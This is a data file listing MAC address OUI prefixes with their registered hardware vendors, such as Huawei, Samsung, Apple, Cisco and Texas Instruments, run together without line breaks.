COIN AB 001B84 Scan Engineering Telecom F8369B Texas Instruments 88AE1D COMPAL INFORMATION (KUNSHAN) CO., LTD. 3412F9 HUAWEI TECHNOLOGIES CO.,LTD BCE265 HUAWEI TECHNOLOGIES CO.,LTD 4CD1A1 HUAWEI TECHNOLOGIES CO.,LTD 88BFE4 HUAWEI TECHNOLOGIES CO.,LTD C4B8B4 HUAWEI TECHNOLOGIES CO.,LTD 289EFC Sagemcom Broadband SAS 00C055 MODULAR COMPUTING TECHNOLOGIES E41FE9 Dunkermotoren GmbH D8760A Escort, Inc. 20163D Integrated Device Technology (Malaysia) Sdn. Bhd. 641331 Bosch Car Multimedia (Wuhu) Co. Ltd. 183A48 VostroNet 782F17 Xlab Co.,Ltd E0735F NUCOM 0051ED LG Innotek C4518D Shenzhen YOUHUA Technology Co., Ltd 486834 Silicon Motion, Inc. 98039B Mellanox Technologies, Inc. 40DC9D HAJEN F0BCC9 PFU LIMITED B0027E MULLER SERVICES 24FAF3 Shanghai Flexem Technology Co.,Ltd. 340A98 HUAWEI TECHNOLOGIES CO.,LTD 646D6C HUAWEI TECHNOLOGIES CO.,LTD A09351 Cisco Systems, Inc 5C2ED2 ABC(XiSheng) Electronics Co.,Ltd 9C5A44 COMPAL INFORMATION (KUNSHAN) CO., LTD. 14CAA0 Hu&Co B888E3 COMPAL INFORMATION (KUNSHAN) CO., LTD. 208984 COMPAL INFORMATION (KUNSHAN) CO., LTD. B4CEFE James Czekaj 001133 Siemens AG Austria 000B23 Siemens Home & Office Comm. Devices 88D2BF German Autolabs 487583 Intellion AG 904C81 Hewlett Packard Enterprise 8C3579 QDIQO Sp. z o.o. 80B575 HUAWEI TECHNOLOGIES CO.,LTD A4BE2B HUAWEI TECHNOLOGIES CO.,LTD D82477 Universal Electric Corporation 00907F WatchGuard Technologies, Inc. 4C5E0C Routerboard.com 38C70A WiFiSong FCFBFB Cisco Systems, Inc 007E95 Cisco Systems, Inc 683A1E Cisco Meraki 001017 Bosch Access Systems GmbH F4EE14 MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 6C5940 MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. D02516 MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 1C60DE MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. D4CA6D Routerboard.com 001472 China Broadband Wireless IP Standard group(ChinaBWIPS) 08D46A LG Electronics (Mobile Communications) 4006A0 Texas Instruments 68E7C2 Samsung Electronics Co.,Ltd 58B10F Samsung Electronics Co.,Ltd BC9911 Zyxel Communications Corporation 280245 Konze System Technology Co.,Ltd. E48F65 Yelatma Instrument Making Enterprise, JSC 840D8E Espressif Inc. F82DC0 ARRIS Group, Inc. 189C27 ARRIS Group, Inc. 3CF5CC New H3C Technologies Co., Ltd 00BB3A Amazon Technologies Inc. 2811A5 Bose Corporation D8F3DB Post CH AG DCB4AC FLEXTRONICS MANUFACTURING(ZHUHAI)CO.,LTD. 64A2F9 OnePlus Technology (Shenzhen) Co., Ltd A87D12 HUAWEI TECHNOLOGIES CO.,LTD 203DBD LG Innotek A492CB Nokia C0D2F3 Hui Zhou Gaoshengda Technology Co.,LTD B88303 Hewlett Packard Enterprise C08135 Ningbo Forfan technology Co., LTD 3CF4F9 Moda-InnoChips 94193A Elvaco AB A45385 WEIFANG GOERTEK ELECTRONICS CO.,LTD 00402F XLNT DESIGNS INC. 04ECBB Fiberhome Telecommunication Technologies Co.,LTD D42122 Sercomm Corporation. 00C002 Sercomm Corporation. 58DB15 TECNO MOBILE LIMITED 5050CE Hangzhou Dianyixia Communication Technology Co. Ltd. 2C28B7 Hangzhou Ruiying technology co., LTD 046B1B SYSDINE Co., Ltd. 505DAC HUAWEI TECHNOLOGIES CO.,LTD B0A37E QING DAO HAIER TELECOM CO.,LTD. 3CEAF9 JUBIXCOLTD 682C7B Cisco Systems, Inc 441E98 Ruckus Wireless 88D37B FirmTek, LLC B4C0F5 Shenzhen TINNO Mobile Technology Corp. 406231 GIFA FCB7F0 Idaho National Laboratory 1C666D Hon Hai Precision Ind. Co.,Ltd. DCDE4F Gionee Communication Equipment Co Ltd 4CD0CB HUAWEI TECHNOLOGIES CO.,LTD E8FAF7 Guangdong Uniteddata Holding Group Co., Ltd. 949D57 Panasonic do Brasil Limitada FC6947 Texas Instruments E07DEA Texas Instruments 04D3B0 Intel Corporate 002082 ONEAC CORPORATION 0000A8 Stratus Technologies 0004FC Stratus Technologies 3C24F0 IEEE Registration Authority 0CB34F Shenzhen Xiaoqi Intelligent Technology Co., Ltd. 002FD9 Fiberhome Telecommunication Technologies Co.,LTD 0C8063 TP-LINK TECHNOLOGIES CO.,LTD. 007278 Cisco Systems, Inc 00A021 General Dynamics Mission Systems 84F3EB Espressif Inc. 001B48 Shenzhen Lantech Electronics Co., Ltd. DC2919 AltoBeam (Xiamen) Technology Ltd, Co. F0AF50 Phantom Intelligence B4CD27 HUAWEI TECHNOLOGIES CO.,LTD 549963 Apple, Inc. 90DD5D Apple, Inc. 00250C Senet Inc C819F7 Samsung Electronics Co.,Ltd 885FE8 IEEE Registration Authority 645AED Apple, Inc. C0B658 Apple, Inc. 48A91C Apple, Inc. 50BC96 Apple, Inc. FC2A9C Apple, Inc. A056F3 Apple, Inc. 180F76 D-Link International 14A72B currentoptronics Pvt.Ltd 0C08B4 HUMAX Co., Ltd. 6402CB ARRIS Group, Inc. DC0265 Meditech Kft 34029B Plexonics Technologies LImited C42C4F Qingdao Hisense Mobile Communication Technology Co,Ltd 24CACB Fiberhome Telecommunication Technologies Co.,LTD 543E64 Fiberhome Telecommunication Technologies Co.,LTD 002705 Sectronic 48BD3D New H3C Technologies Co., Ltd F4E11E Texas Instruments 3880DF Motorola Mobility LLC, a Lenovo Company BC6A2F Henge Docks LLC 3C1710 Sagemcom Broadband SAS 909497 HUAWEI TECHNOLOGIES CO.,LTD DC729B HUAWEI TECHNOLOGIES CO.,LTD A4DA22 IEEE Registration Authority 900372 Longnan Junya Digital Technology Co. Ltd. 84DB9E Pink Nectarine Health AB 04D13A Xiaomi Communications Co Ltd 6CC4D5 HMD Global Oy 80C548 Shenzhen Zowee Technology Co.,Ltd B4E9A3 port industrial automation GmbH 94FE9D SHENZHEN GONGJIN ELECTRONICS CO.,LT 6CB6CA DIVUS GmbH E8DEFB MESOTIC SAS C400AD Advantech Technology (CHINA) Co., Ltd. 3499D7 Universal Flow Monitors, Inc. 0C8BD3 ITEL MOBILE LIMITED 0CC6CC HUAWEI TECHNOLOGIES CO.,LTD 785860 HUAWEI TECHNOLOGIES CO.,LTD E8ABF3 HUAWEI TECHNOLOGIES CO.,LTD 449EF9 vivo Mobile Communication Co., Ltd. 8C4CAD Evoluzn Inc. 8CF957 RuiXingHengFang Network (Shenzhen) Co.,Ltd 74E182 Texas Instruments 4C776D Cisco Systems, Inc 3CDCBC Samsung Electronics Co.,Ltd 804E70 Samsung Electronics Co.,Ltd D4E6B7 Samsung Electronics Co.,Ltd 980074 Raisecom Technology CO., LTD 18C19D Integrated Device Technology (Malaysia) Sdn. Bhd. 0C9838 Xiaomi Communications Co Ltd 347C25 Apple, Inc. CC2DB7 Apple, Inc. FCA183 Amazon Technologies Inc. 6C2ACB Paxton Access Ltd C48466 Apple, Inc. 0024AF Dish Technologies Corp C0A8F0 Adamson Systems Engineering 9C431E IEEE Registration Authority 4CC206 Somfy 282C02 IEEE Registration Authority 583BD9 Fiberhome Telecommunication Technologies Co.,LTD DCA266 Hon Hai Precision Ind. Co.,Ltd. 040973 Hewlett Packard Enterprise A0BDCD SKY UK LIMITED B4C799 Extreme Networks, Inc. 44AD19 XINGFEI (H.K)LIMITED 38ADBE New H3C Technologies Co., Ltd 646E6C Radio Datacom LLC E88E60 NSD Corporation 000F9B Ross Video Limited 0024BA Texas Instruments 60512C TCT mobile ltd 64DB81 Syszone Co., Ltd. BC91B5 Infinix mobility limited 282FC2 Automotive Data Solutions D41A3F GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 30C507 ECI Telecom Ltd. 5C865C Samsung Electronics Co.,Ltd 74EACB New H3C Technologies Co., Ltd 04F128 HMD Global Oy 0C5203 AGM GROUP LIMITED 2C5491 Microsoft Corporation 5CE28C Zyxel Communications Corporation E4BD4B zte corporation 3817C3 Hewlett Packard Enterprise 001E1D East Coast Datacom, Inc. C8458F Wyler AG 001BB9 Elitegroup Computer Systems Co.,Ltd. 002461 Shin Wang Tech. E4A7A0 Intel Corporate 04B167 Xiaomi Communications Co Ltd EC8350 Microsoft Corporation 5CAD76 Shenzhen TCL New Technology Co., Ltd 38D7CA 7HUGS LABS 7846C4 DAEHAP HYPER-TECH 1CDF52 Texas Instruments 48BA4E Hewlett Packard FCD6BD Robert Bosch GmbH 701F53 Cisco Systems, Inc 0C1C20 Kakao Corp 24F5A2 Belkin International Inc. 94282E New H3C Technologies Co., Ltd 18396E SUNSEA TELECOMMUNICATIONS CO.,LTD. EC7D11 vivo Mobile Communication Co., Ltd. 000144 Dell EMC 08001B Dell EMC 7C010A Texas Instruments D80831 Samsung Electronics Co.,Ltd A04EA7 Apple, Inc. F0989D Apple, Inc. E42B34 Apple, Inc. 3C2EF9 Apple, Inc. 9441C1 Mini-Cam Limited 8C3C4A NAKAYO Inc 185282 Fiberhome Telecommunication Technologies Co.,LTD 74BBD3 Shenzhen xeme Communication Co., Ltd. 500F80 Cisco Systems, Inc 504EDC Ping Communication 08674E Hisense broadband multimedia technology Co.,Ltd 8C68C8 zte corporation EC8263 zte corporation 98F5A9 OHSUNG 6CB749 HUAWEI TECHNOLOGIES CO.,LTD 989C57 HUAWEI TECHNOLOGIES CO.,LTD 683C7D Magic Intelligence Technology Limited 7086C1 Texas Instruments 10F1F2 LG Electronics (Mobile Communications) F4D7B2 LGS Innovations, LLC 00152A Nokia Corporation 9C4A7B Nokia Corporation 2CD2E7 Nokia Corporation 386EA2 vivo Mobile Communication Co., Ltd. 982D68 Samsung Electronics Co., Ltd ECEBB8 Hewlett Packard Enterprise DC6AEA Infinix mobility limited A41115 Robert Bosch Engineering and Business Solutions pvt. Ltd. 48EC5B Nokia Solutions and Networks GmbH & Co. KG D86162 Wistron Neweb Corporation 80739F KYOCERA CORPORATION 28840E silicon valley immigration service 80615F Beijing Sinead Technology Co., Ltd. 40D63C Equitech Industrial(DongGuan)Co.,Ltd F4F3AA JBL GmbH & Co. KG 40A3CC Intel Corporate 444AB0 Zhejiang Moorgen Intelligence Technology Co., Ltd B019C6 Apple, Inc. 3866F0 Apple, Inc. BC2E48 ARRIS Group, Inc. 608CE6 ARRIS Group, Inc. 080070 Mitsubishi Precision Co.,LTd. C421C8 KYOCERA CORPORATION 84253F silex technology, Inc. 0008C9 TechniSat Digital GmbH Daun D8B12A Panasonic Mobile Communications Co.,Ltd. 705812 Panasonic Corporation AVC Networks Company 04209A Panasonic Corporation AVC Networks Company 34008A IEEE Registration Authority 9050CA Hitron Technologies. Inc 409922 AzureWave Technology Inc. C06D1A Tianjin Henxinhuifeng Technology Co.,Ltd. 107B44 ASUSTek COMPUTER INC. 703EAC Apple, Inc. 0011C0 Aday Technology Inc 0005F1 Vrcom, Inc. 1CAB34 New H3C Technologies Co., Ltd 3C7843 HUAWEI TECHNOLOGIES CO.,LTD 5C0979 HUAWEI TECHNOLOGIES CO.,LTD E4FB5D HUAWEI TECHNOLOGIES CO.,LTD E86819 HUAWEI TECHNOLOGIES CO.,LTD AC512C Infinix mobility limited 0030C8 GAD LINE, LTD. 0016E0 3Com Ltd D8DECE ISUNG CO.,LTD 801934 Intel Corporate 747D24 Phicomm (Shanghai) Co., Ltd. 50642B XIAOMI Electronics,CO.,LTD 30C01B Shenzhen Jingxun Software Telecommunication Technology Co.,Ltd 309935 zte corporation 0C72D9 zte corporation 008009 JUPITER SYSTEMS, INC. 00C064 General Datacomm LLC 6432A8 Intel Corporate 8C2505 HUAWEI TECHNOLOGIES CO.,LTD 08A8A1 Cyclotronics Power Concepts, Inc F4B520 Biostar Microtech international corp. 8886C2 STABILO International GmbH CC2F71 Intel Corporate B8F8BE BLUECOM 2C5D93 Ruckus Wireless 38FF36 Ruckus Wireless A47B9D Espressif Inc. 7C2EDD Samsung Electronics Co.,Ltd 3CF7A4 Samsung Electronics Co.,Ltd 103034 Cara Systems 8C3BAD NETGEAR 64CFD9 Texas Instruments 887A31 Velankani Electronics Pvt. Ltd. 8C0F6F PEGATRON CORPORATION 0000FE Annapolis Micro Systems, Inc. 38E595 SHENZHEN GONGJIN ELECTRONICS CO.,LT BC9680 SHENZHEN GONGJIN ELECTRONICS CO.,LT 2C9EEC Jabil Circuit Penang C4571F June Life Inc 886AE3 Alpha Networks Inc. 1C4D70 Intel Corporate B44F96 Zhejiang Xinzailing Technology co., ltd 4C65A8 IEEE Registration Authority D822F4 Avnet Silica 348F27 Ruckus Wireless E86D65 AUDIO MOBIL Elektronik GmbH 6447E0 Feitian Technologies Co., Ltd E0CBBC Cisco Meraki B0DFC1 Tenda Technology Co.,Ltd.Dongguan branch 9C6F52 zte corporation 84183A Ruckus Wireless 24C9A1 Ruckus Wireless 002482 Ruckus Wireless 689234 Ruckus Wireless 50A733 Ruckus Wireless 706E6D Cisco Systems, Inc 00D01F Senetas Corporation Ltd 604762 Beijing Sensoro Technology Co.,Ltd. B0DAF9 ARRIS Group, Inc. 1835D1 ARRIS Group, Inc. C0A5DD SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 745427 SHENZHEN FAST TECHNOLOGIES CO.,LTD 60720B BLU Products Inc 308976 DALIAN LAMBA TECHNOLOGY CO.,LTD 2C2617 Oculus VR, LLC BC1C81 Sichuan iLink Technology Co., Ltd. 900A1A Taicang T&W Electronics 506E92 Innocent Technology Co., Ltd. 30FE31 Nokia 98F2B3 Hewlett Packard Enterprise E8E1E1 Gemtek Technology Co., Ltd. 28070D GUANGZHOU WINSOUND INFORMATION TECHNOLOGY CO.,LTD. 00A3D1 Cisco Systems, Inc 34D954 WiBotic Inc. 4857DD Facebook Inc 487D2E TP-LINK TECHNOLOGIES CO.,LTD. F0D4F6 Lars Thrane A/S F4A997 CANON INC. 488D36 Arcadyan Corporation BCD713 Owl Labs FC4D8C SHENZHEN PANTE ELECTRONICS TECHNOLOGY CO., LTD FC06ED M2Motive Technology Inc. 001CFA Alarm.com 60313B Sunnovo International Limited 6CB227 Sony Video & Sound Products Inc. 000CAB Commend International GmbH 64DFE9 ATEME 986F60 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD F07485 NGD Systems, Inc. 10C6FC Garmin International 20F452 Shanghai IUV Software Development Co. Ltd B43934 Pen Generations, Inc. 7426AC Cisco Systems, Inc AC2205 Compal Broadband Networks, Inc. 80A036 Shanghai MXCHIP Information Technology Co., Ltd. B02628 Broadcom Limited 9874DA Infinix mobility limited 1C5A0B Tegile Systems 50338B Texas Instruments 9C061B Hangzhou H3C Technologies Co., Limited A0094C CenturyLink 704CA5 Fortinet, Inc. 143F27 Noccela Oy 105887 Fiberhome Telecommunication Technologies Co.,LTD 6854ED Alcatel-Lucent E037BF Wistron Neweb Corporation E81367 AIRSOUND Inc. AC202E Hitron Technologies. Inc D8D866 SHENZHEN TOZED TECHNOLOGIES CO.,LTD. D8C06A Hunantv.com Interactive Entertainment Media Co.,Ltd. 046E02 OpenRTLS Group 900E83 Monico Monitoring, Inc. 601466 zte corporation 38AC3D Nephos Inc AC7409 Hangzhou H3C Technologies Co., Limited F40343 Hewlett Packard Enterprise E8DE8E Integrated Device Technology (Malaysia) Sdn. Bhd. 001192 Cisco Systems, Inc 38F135 SensorTec-Canada 680235 Konten Networks Inc. C49DED Microsoft Corporation 98A40E Snap, Inc. F49634 Intel Corporate 70AF24 TP Vision Belgium NV A41163 IEEE Registration Authority E8D11B ASKEY COMPUTER CORP 7CE97C ITEL MOBILE LIMITED C4D197 Ventia Utility Services F093C5 Garland Technology 9810E8 Apple, Inc. C0D012 Apple, Inc. BCA920 Apple, Inc. 48A195 Apple, Inc. F80377 Apple, Inc. 2C86D2 Cisco Systems, Inc CCBE59 Calix Inc. DCA4CA Apple, Inc. 8C8FE9 Apple, Inc. 70AF25 Nishiyama Industry Co.,LTD. 8058F8 Motorola Mobility LLC, a Lenovo Company 001912 Welcat Inc B8F883 TP-LINK TECHNOLOGIES CO.,LTD. DCFE18 TP-LINK TECHNOLOGIES CO.,LTD. 704F57 TP-LINK TECHNOLOGIES CO.,LTD. B0C46C Senseit 9800C1 GuangZhou CREATOR Technology Co.,Ltd.(CHINA) 98D3D2 MEKRA Lang GmbH & Co. KG 0C5F35 Niagara Video Corporation 54E1AD LCFC(HeFei) Electronics Technology co., ltd 903D6B Zicon Technology Corp. 8C78D7 SHENZHEN FAST TECHNOLOGIES CO.,LTD B8EAAA ICG NETWORKS CO.,ltd 4C4E03 TCT mobile ltd 50E666 Shenzhen Techtion Electronics Co., Ltd. 0016D3 Wistron Corporation 001F16 Wistron Corporation 00262D Wistron Corporation 00210D SAMSIN INNOTEC B04089 Senient Systems LTD 5425EA HUAWEI TECHNOLOGIES CO.,LTD C894BB HUAWEI TECHNOLOGIES CO.,LTD F8A34F zte corporation C87324 Sow Cheng Technology Co. Ltd. 5CBA37 Microsoft Corporation 10B1F8 HUAWEI TECHNOLOGIES CO.,LTD 089E08 Google, Inc. 28FECD Lemobile Information Technology (Beijing) Co., Ltd. 00C0C6 PERSONAL MEDIA CORP. 3C7F6F Telechips, Inc. 0002A1 World Wide Packets 00E022 Analog Devices, Inc. 000277 Cash Systemes Industrie CCA219 SHENZHEN ALONG INVESTMENT CO.,LTD 4C1A3A PRIMA Research And Production Enterprise Ltd. 8CA5A1 Oregano Systems - Design & Consulting GmbH B8ECA3 Zyxel Communications Corporation 5419C8 vivo Mobile Communication Co., Ltd. C0D9F7 ShanDong Domor Intelligent S&T CO.,Ltd 00608B ConferTech International 0495E6 Tenda Technology Co.,Ltd.Dongguan branch 702D84 i4C Innovations ACC1EE Xiaomi Communications Co Ltd B0B98A NETGEAR 805A04 LG Electronics (Mobile Communications) 2C200B Apple, Inc. 8866A5 Apple, Inc. 901711 Hagenuk Marinekommunikation GmbH 0010DE INTERNATIONAL DATACASTING CORPORATION 18F87A i3 International Inc. A0E4CB Zyxel Communications Corporation 284ED7 OutSmart Power Systems, Inc. B05216 Hon Hai Precision Ind. Co.,Ltd. A4EE57 Seiko Epson Corporation 9CAED3 Seiko Epson Corporation 707C69 Avaya Inc 500B91 IEEE Registration Authority F8461C Sony Interactive Entertainment Inc. 704D7B ASUSTek COMPUTER INC. E4B005 Beijing IQIYI Science & Technology Co., Ltd. 38BC01 HUAWEI TECHNOLOGIES CO.,LTD 341E6B HUAWEI TECHNOLOGIES CO.,LTD 886639 HUAWEI TECHNOLOGIES CO.,LTD 000048 Seiko Epson Corporation B0E892 Seiko Epson Corporation AC1826 Seiko Epson Corporation 64A68F Zhongshan Readboy Electronics Co.,Ltd 14A78B Zhejiang Dahua Technology Co., Ltd. BC8385 Microsoft Corporation 001438 Hewlett Packard Enterprise 00425A Cisco Systems, Inc 9CFBD5 vivo Mobile Communication Co., Ltd. 18F76B Zhejiang Winsight Technology CO.,LTD 1CC0E1 IEEE Registration Authority 5CE30E ARRIS Group, Inc. 583112 DRUST 2C598A LG Electronics (Mobile Communications) 686975 Angler Labs Inc C816A5 Masimo Corporation 4C11BF Zhejiang Dahua Technology Co., Ltd. A0B8F8 Amgen U.S.A. Inc. 4C26E7 Welgate Co., Ltd. 006041 Yokogawa Digital Computer Corporation 48D343 ARRIS Group, Inc. 00C05A SEMAPHORE COMMUNICATIONS CORP. 0007F9 Sensaphone 001CB3 Apple, Inc. 884477 HUAWEI TECHNOLOGIES CO.,LTD 149D09 HUAWEI TECHNOLOGIES CO.,LTD 20D25F SmartCap Technologies E47DBD Samsung Electronics Co.,Ltd 9C83BF PRO-VISION, Inc. 78EF4C Unetconvergence Co., Ltd. 58696C Ruijie Networks Co.,LTD 3C8BCD Alcatel-Lucent Shanghai Bell Co., Ltd 4CF95D HUAWEI TECHNOLOGIES CO.,LTD 28EE52 TP-LINK TECHNOLOGIES CO.,LTD. 001A39 Merten GmbH&CoKG 14EDBB 2Wire Inc E07C13 zte corporation F41F88 zte corporation 18E29F vivo Mobile Communication Co., Ltd. 00B0E1 Cisco Systems, Inc 005093 BOEING 905C44 Compal Broadband Networks, Inc. F07960 Apple, Inc. A0D795 Apple, Inc. 0090E7 HORSCH ELEKTRONIK AG E43ED7 Arcadyan Corporation 24920E Samsung Electronics Co.,Ltd FC4203 Samsung Electronics Co.,Ltd A01081 Samsung Electronics Co.,Ltd C81B5C BCTech 8421F1 HUAWEI TECHNOLOGIES CO.,LTD 707990 HUAWEI TECHNOLOGIES CO.,LTD A04E01 CENTRAL ENGINEERING co.,ltd. 28CA09 ThyssenKrupp Elevators (Shanghai) Co.,Ltd 981333 zte corporation F8633F Intel Corporate 088620 TECNO MOBILE LIMITED 5C2443 O-Sung Telecom Co., Ltd. 2047ED SKY UK LIMITED 748A69 Korea Image Technology Co., Ltd 5454CF PROBEDIGITAL CO.,LTD 00F22C Shanghai B-star Technology Co.,Ltd. 842519 Samsung Electronics 6474F6 Shooter Detection Systems 002566 Samsung Electronics Co.,Ltd 0005EE Vanderbilt International (SWE) AB 04180F Samsung Electronics Co.,Ltd 2013E0 Samsung Electronics Co.,Ltd 3C77E6 Hon Hai Precision Ind. Co.,Ltd. 70188B Hon Hai Precision Ind. Co.,Ltd. B88EDF Zencheer Communication Technology Co., Ltd. C09F05 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 5C4979 AVM Audiovisuelles Marketing und Computersysteme GmbH C0F945 Toshiba Toko Meter Systems Co., LTD. 002485 ConteXtream Ltd 28FCF6 Shenzhen Xin KingBrand enterprises Co.,Ltd 001F58 EMH Energiemesstechnik GmbH 0016DF Lundinova AB 001D0C MobileCompia 70F8E7 IEEE Registration Authority D42C44 Cisco Systems, Inc 843DC6 Cisco Systems, Inc D0DB32 Nokia Corporation E80036 Befs co,. ltd DC7144 SAMSUNG ELECTRO MECHANICS CO., LTD. 980C82 SAMSUNG ELECTRO MECHANICS CO., LTD. A00BBA SAMSUNG ELECTRO MECHANICS CO., LTD. 689423 Hon Hai Precision Ind. Co.,Ltd. 844BF5 Hon Hai Precision Ind. Co.,Ltd. 08EDB9 Hon Hai Precision Ind. Co.,Ltd. 5C6D20 Hon Hai Precision Ind. Co.,Ltd. 5CAC4C Hon Hai Precision Ind. Co.,Ltd. 005A13 HUAWEI TECHNOLOGIES CO.,LTD 34E71C Shenzhen YOUHUA Technology Co., Ltd 8018A7 Samsung Electronics Co.,Ltd F47B5E Samsung Electronics Co.,Ltd 08C6B3 QTECH LLC 0018AF Samsung Electronics Co.,Ltd 001EE1 Samsung Electronics Co.,Ltd 606BBD Samsung Electronics Co.,Ltd 00214C Samsung Electronics Co.,Ltd 00166B Samsung Electronics Co.,Ltd 0000F0 Samsung Electronics Co.,Ltd 8CC8CD Samsung Electronics Co.,Ltd 184617 Samsung Electronics Co.,Ltd 380A94 Samsung Electronics Co.,Ltd D0DFC7 Samsung Electronics Co.,Ltd D0C1B1 Samsung Electronics Co.,Ltd 70F927 Samsung Electronics Co.,Ltd 34AA8B Samsung Electronics Co.,Ltd BC4486 Samsung Electronics Co.,Ltd 20D390 Samsung Electronics Co.,Ltd 9401C2 Samsung Electronics Co.,Ltd 50FC9F Samsung Electronics Co.,Ltd 380B40 Samsung Electronics Co.,Ltd 24DBED Samsung Electronics Co.,Ltd C45006 Samsung Electronics Co.,Ltd 88329B SAMSUNG ELECTRO-MECHANICS(THAILAND) 1449E0 SAMSUNG ELECTRO-MECHANICS(THAILAND) D02544 SAMSUNG ELECTRO-MECHANICS(THAILAND) A8F274 Samsung Electronics Co.,Ltd D487D8 Samsung Electronics Co.,Ltd F0728C Samsung Electronics Co.,Ltd 886AB1 vivo Mobile Communication Co., Ltd. 6C1E90 Hansol Technics Co., Ltd. 9884E3 Texas Instruments 38D269 Texas Instruments C8FD19 Texas Instruments 508CB1 Texas Instruments 440444 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 400D10 ARRIS Group, Inc. 943DC9 Asahi Net, Inc. 0081C4 Cisco Systems, Inc 58E876 IEEE Registration Authority 00177E Meshcom Technologies Inc. 98F058 Lynxspring, Incl. C4F5A5 Kumalift Co., Ltd. A00460 NETGEAR C8DE51 IntegraOptics B8FF61 Apple, Inc. 946124 Pason Systems 68C44D Motorola Mobility LLC, a Lenovo Company 70B14E ARRIS Group, Inc. 304487 Hefei Radio Communication Technology Co., Ltd DC6672 Samsung Electronics Co.,Ltd EC8EB5 Hewlett Packard 70AF6A SHENZHEN FENGLIAN TECHNOLOGY CO., LTD. 20F543 Hui Zhou Gaoshengda Technology Co.,LTD 2C9D1E HUAWEI TECHNOLOGIES CO.,LTD E0DDC0 vivo Mobile Communication Co., Ltd. D03742 Yulong Computer Telecommunication Scientific (Shenzhen) Co.,Ltd F8E61A Samsung Electronics Co.,Ltd 84B541 Samsung Electronics Co.,Ltd 006F64 Samsung Electronics Co.,Ltd 000F06 Nortel Networks 001765 Nortel Networks 0015E8 Nortel Networks 00159B Nortel Networks 001540 Nortel Networks 001ECA Nortel Networks 00130A Nortel Networks 001F0A Nortel Networks 6CA858 Fiberhome Telecommunication Technologies Co.,LTD C4047B Shenzhen YOUHUA Technology Co., Ltd 20F41B Shenzhen Bilian electronic CO.,LTD A84E3F Hitron Technologies. Inc A091C8 zte corporation 001E40 Shanghai DareGlobal Technologies Co.,Ltd 94D723 Shanghai DareGlobal Technologies Co.,Ltd FCFAF7 Shanghai Baud Data Communication Co.,Ltd. D826B9 Guangdong Coagent Electronics S&T Co.,Ltd. AC9CE4 Alcatel-Lucent Shanghai Bell Co., Ltd 00233E Alcatel-Lucent IPD 6CBEE9 Alcatel-Lucent IPD 00164D Alcatel-Lucent IPD 001AF0 Alcatel-Lucent IPD 38521A Nokia 700514 LG Electronics (Mobile Communications) E892A4 LG Electronics (Mobile Communications) 10683F LG Electronics (Mobile Communications) 40B0FA LG Electronics (Mobile Communications) A039F7 LG Electronics (Mobile Communications) 08D833 Shenzhen RF Technology Co., Ltd A46032 MRV Communications (Networks) LTD 0022A9 LG Electronics (Mobile Communications) 0025E5 LG Electronics (Mobile Communications) 0021FB LG Electronics (Mobile Communications) 34FCEF LG Electronics (Mobile Communications) BCF5AC LG Electronics (Mobile Communications) 98D6F7 LG Electronics (Mobile Communications) 000EE8 Zioncom Electronics (Shenzhen) Ltd. 00C095 ZNYX Networks, Inc. 002025 CONTROL TECHNOLOGY, INC. 683563 SHENZHEN LIOWN ELECTRONICS CO.,LTD. 004072 Applied Innovation Inc. 00E08B QLogic Corporation D8EB97 TRENDnet, Inc. 00B064 Cisco Systems, Inc 68A0F6 HUAWEI TECHNOLOGIES CO.,LTD 000E5C ARRIS Group, Inc. 845DD7 Shenzhen Netcom Electronics Co.,Ltd 4439C4 Universal Global Scientific Industrial Co., Ltd. 402CF4 Universal Global Scientific Industrial Co., Ltd. 001E37 Universal Global Scientific Industrial Co., Ltd. 001A6B Universal Global Scientific Industrial Co., Ltd. 001641 Universal Global Scientific Industrial Co., Ltd. 0010C6 Universal Global Scientific Industrial Co., Ltd. 00247E Universal Global Scientific Industrial Co., Ltd. 00DD0A UNGERMANN-BASS INC. 78C2C0 IEEE Registration Authority 1CCAE3 IEEE Registration Authority E4956E IEEE Registration Authority B437D1 IEEE Registration Authority 2C6A6F IEEE Registration Authority 40667A mediola - connected living AG 9C2A83 Samsung Electronics Co.,Ltd 0055DA IEEE Registration Authority 001C7E Toshiba 002318 Toshiba B86B23 Toshiba 0008F1 Voltaire 00199D Vizio, Inc 001938 UMB Communications Co., Ltd. 002517 Venntis, LLC 00600F Westell Technologies Inc. 00183A Westell Technologies Inc. 48FCB6 LAVA INTERNATIONAL(H.K) LIMITED B0E235 Xiaomi Communications Co Ltd 40C729 Sagemcom Broadband SAS 14C913 LG Electronics C0C976 Shenzhen TINNO Mobile Technology Corp. 588BF3 Zyxel Communications Corporation 5067F0 Zyxel Communications Corporation 001349 Zyxel Communications Corporation D8E0B8 BULAT LLC 603197 Zyxel Communications Corporation F8A097 ARRIS Group, Inc. FC2325 EosTek (Shenzhen) Co., Ltd. 6002B4 Wistron Neweb Corporation 94DF4E Wistron InfoComm(Kunshan)Co.,Ltd. 98EECB Wistron Infocomm (Zhongshan) Corporation 683E34 MEIZU Technology Co., Ltd. 001BFE Zavio Inc. 5410EC Microchip Technology Inc. 0004A3 Microchip Technology Inc. 789CE7 Shenzhen Aikede Technology Co., Ltd 509F3B OI ELECTRIC CO.,LTD 1C57D8 Kraftway Corporation PLC 446EE5 HUAWEI TECHNOLOGIES CO.,LTD C8778B Mercury Systems – Trusted Mission Solutions, Inc. 00044B NVIDIA AC9B0A Sony Corporation 104FA8 Sony Corporation AC040B Peloton Interactive, Inc 000B6B Wistron Neweb Corporation A06090 Samsung Electronics Co.,Ltd BC765E Samsung Electronics Co.,Ltd E0A8B8 Le Shi Zhi Xin Electronic Technology (Tianjin) Limited F45B73 Wanjiaan Interconnected Technology Co., Ltd B88198 Intel Corporate 8C59C3 ADB Italia C83DFC AlphaTheta Corporation CCD31E IEEE Registration Authority 34B354 HUAWEI TECHNOLOGIES CO.,LTD 6C0EE6 Chengdu Xiyida Electronic Technology Co,.Ltd B0D7CC Tridonic GmbH & Co KG 2CDDA3 Point Grey Research Inc. 00809F ALE International B824F0 SOYO Technology Development Co., Ltd. D85B2A Samsung Electronics Co.,Ltd 8C6D50 SHENZHEN MTC CO LTD A009ED Avaya Inc 0014B4 General Dynamics United Kingdom 